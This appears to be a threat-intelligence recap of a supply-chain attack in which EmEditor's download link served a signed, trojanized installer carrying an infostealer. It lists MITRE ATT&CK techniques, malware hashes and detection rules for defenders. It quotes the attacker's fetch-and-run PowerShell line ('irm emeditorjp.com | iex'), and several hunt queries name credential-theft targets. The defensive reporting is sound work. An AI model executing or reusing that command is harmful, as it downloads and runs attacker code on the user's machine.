EmEditor Software Supply Chain Attack Recap

Jan 5

BLUF

The download button on the EmEditor website was compromised to redirect users to a fake installer that deployed infostealer malware.

Executive Cost Summary

This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.

For organizations affected by a compromised legitimate software download delivering infostealer malware:

Low-end total cost: $550,000 – $800,000
(Limited user exposure, rapid containment, no downstream credential abuse)
Typical expected range: $900,000 – $1.6M
(Multiple users affected, enterprise-wide credential resets, extended monitoring)
Upper-bound realistic scenarios: $2M – $3.5M
(Credential reuse detected, regulatory involvement, prolonged assurance efforts)

Key cost driver:

Scope of credential theft rather than system destruction
Number of affected users with privileged or sensitive access
Duration of uncertainty around downstream misuse of stolen data
Regulatory and audit expectations tied to software supply-chain integrity

Targeted Sectors

· Software users

· E-commerce

· Finance

· Healthcare.

Countries

· U.S. supply chains targeted

Date of First Reported Activity

· December 25, 2025

Date of Last Reported Activity Update

· January 5, 2026

APT Names

· There have not been any APT groups named in open source reporting at this time.

Associated Criminal Organization Names

· There have not been any criminal organizations named in open source reporting at this time.

IOCs

Malicious redirect URLs from the EmEditor website.

Hash of the fake installer.

C2 domains for the infostealer.

Tools Used in Campaign

· Infostealer malware

· Rogue browser extensions for remote control/crypto swapping.

CVEs and CVSS Vectors

· This activity has not been associated with any exploits at this time

Nessus ID

There have not been any CVEs reported at this time

Mitigation Data

· Users were advised to verify the integrity of their downloaded software and use prevention first

· AI-driven security defenses.

Malware Names

Infostealer

MixShell malware

· speculated to be related to similar campaigns

Malware Samples

As a reminder the heuristic behavior of the malware should be what is hunted on. hashes, domains, etc. tend to be dynamic and will usually be different for each target, attack and can be different within the same attack

MixShell

Sha256

e69d8b96b106816cb732190bc6f8c2693aecb6056b8f245e2c15841fcb48ff94

83b27e52c420b6132f8034e7a0fd9943b1f4af3bdb06cdbb873c80360e1e5419

URL link to example

· hxxps://www.virustotal.com/gui/file/e69d8b96b106816cb732190bc6f8c2693aecb6056b8f245e2c15841fcb48ff94

· hxxps://www.virustotal.com/gui/file/83b27e52c420b6132f8034e7a0fd9943b1f4af3bdb06cdbb873c80360e1e5419/community

TTPs

Initial Access

· T1195.002 Compromise Software Supply Chain

o The attackers modified the official EmEditor download infrastructure to serve a malicious version of the software to legitimate users.

· T1189 Drive-by Compromise

o Users were compromised by simply clicking a trusted download button on a legitimate website that had been subverted by threat actors.

Execution

· T1204.002 User Execution Malicious File

o The attack relied on users manually downloading and running the trojanized .msi installer.

· T1059.001 Command and Scripting Interpreter PowerShell

o Upon execution, the malicious installer launched a PowerShell script (powershell.exe "irm emeditorjp.com | iex") to fetch additional malware payloads from a remote server.

Persistence

· T1176 Browser Extensions

o The malware maintained a persistent presence by installing a rogue browser extension named "Google Drive Caching" (ID ngahobakhbdpmokneiohlfofdmgpakd).

Defense Evasion

· T1553.002 Subvert Trust Controls Code Signing

o The malicious installer was digitally signed with a valid certificate from "WALSHAM INVESTMENTS LIMITED" to bypass security warnings and mimic legitimate software.

· T1036 Masquerading

o The installer used the exact same filename and a similar file size as the genuine EmEditor installer to evade visual detection by users.

Credential Access & Collection

· T1555 Credentials from Password Stores

o The malware harvested credentials from web browsers and various applications, including VPN configurations (Zoho Mail, Evernote, Discord, etc.).

· T1056.001 Input Capture Keylogging

o The persistent browser extension was used to record user keystrokes.

· T1113 Screen Capture

o The malware had the capability to take screenshots of the victim's system.

· T1115 Clipboard Modification

o The malware monitored the clipboard to hijack cryptocurrency transactions.

Exfiltration

· T1041 Exfiltration Over C2 Channel

o Stolen data, including cookies, bookmarks, and system information, was sent back to the attackers' command-and-control infrastructure.

Suggested Rules / potential hunts

As a reminder, these are indicator rules. They are likely to be noisy.

For best results consider creating a data model and reviewing the traffic as a report.

Suricata

Malicious Installer Signature Alert

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"MALWARE-OTHER EmEditor Malicious Installer Download (WALSHAM Signed)"; flow:established,to_client; file_data; content:"WALSHAM INVESTMENTS LIMITED"; distance:0; classtype:trojan-activity; sid:2026001; rev:1;)

Command and Control (C2) Communication

alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN EmEditor Supply Chain Attack C2 TLS SNI"; tls.sni; content:"fake-emeditor-domain.com"; nocase; classtype:trojan-activity; sid:2026002; rev:1;)

Malicious Extension ID Detection

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"MALWARE-CNC Malicious Google Drive Caching Extension Communication"; http.uri; content:"ngahobakhbdpmokneiohlfofdmgpakd"; classtype:trojan-activity; sid:2026003; rev:1;)

SentinelOne

Hunt for Malicious Digital Signature

Indicator = "Digital Signature" AND CertificatePublisher = "WALSHAM INVESTMENTS LIMITED" AND ProcessName = "emeditor_setup.msi"

Identify Malicious PowerShell Downloads

ObjectType = "Process" AND ProcessName = "powershell.exe" AND CommandLine Contains "Invoke-WebRequest" AND CommandLine Contains "fake-emeditor-domain.com"

Persistence via Malicious Extension

ObjectType = "File" AND FilePath Contains "ngahobakhbdpmokneiohlfofdmgpakd" AND FilePath Contains "Extensions"

Splunk

Insecure Installer Downloads

index=network sourcetype=stream:http (uri_path="*emeditor_setup.msi" OR uri_path="*emed64_*.msi") | stats count by src_ip, dest_ip, uri_path, http_user_agent

Execution of the Malicious Script

index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 (CommandLine="*powershell*" AND CommandLine="*emeditor*") | table _time, host, user, CommandLine

Credential Theft Indicators

index=windows EventCode=4663 (ProcessName="*powershell.exe" OR ProcessName="*emeditor*") (ObjectName="*VPN*" OR ObjectName="*Zoho*" OR ObjectName="*Slack*" OR ObjectName="*Discord*") | stats count by host, ObjectName, ProcessName

Delivery Method

· Compromised legitimate website/software download link.

Email Samples

· Not applicable

References

Check Point Research

· hxxps://research.checkpoint.com/2026/5th-january-threat-intelligence-report/

EmEditor

· hxxps://www.emeditor.com/general/important-follow-up-security-incident-notice-regarding-the-emeditor-installer-download-link/

Purple Ops

· hxxps://www.purple-ops.io/cybersecurity-threat-intelligence-blog/emeditor-supply-chain-attack/

Security Week

· hxxps://www.securityweek.com/infostealer-malware-delivered-in-emeditor-supply-chain-attack/

SC Media

· hxxps://www.scworld.com/brief/emeditor-supply-chain-compromise-facilitates-infostealer-deployment

VirusTotal